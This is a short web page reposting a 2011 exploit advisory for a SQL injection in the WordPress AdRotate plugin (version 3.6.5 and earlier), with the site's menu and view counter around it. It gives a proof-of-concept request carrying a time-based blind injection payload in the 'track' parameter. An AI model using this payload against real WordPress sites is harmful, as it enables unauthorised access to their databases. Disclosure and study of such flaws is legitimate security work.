Friday, 2024-04-26, 11:12 PM
Welcome
Guest
|
RSS
Site menu
Main page
FAQ
Login form
Buy Wifi Hacking Adapter
Best Laptop for Hacking
Main
Sign Up
Login
Main
»
2011
»
December
» 27
WordPress AdRotate plugin <= 3.6.5 SQL Injection
# Exploit Title: WordPress AdRotate plugin <= 3.6.5 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link:
http://downloads.wordpress.org/plugin/ad....3.6.5.zip
# Version: 3.6.5 (tested)
# Note: magic_quotes has to be turned off
PoC
http://www.site.com/wp-content/plugins/a...p?track=1'
AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23
Vulnerable code
...
Read more »
Views: 1343 | Added by:
defaultNick
| Date:
2011-12-27
|
Comments (0)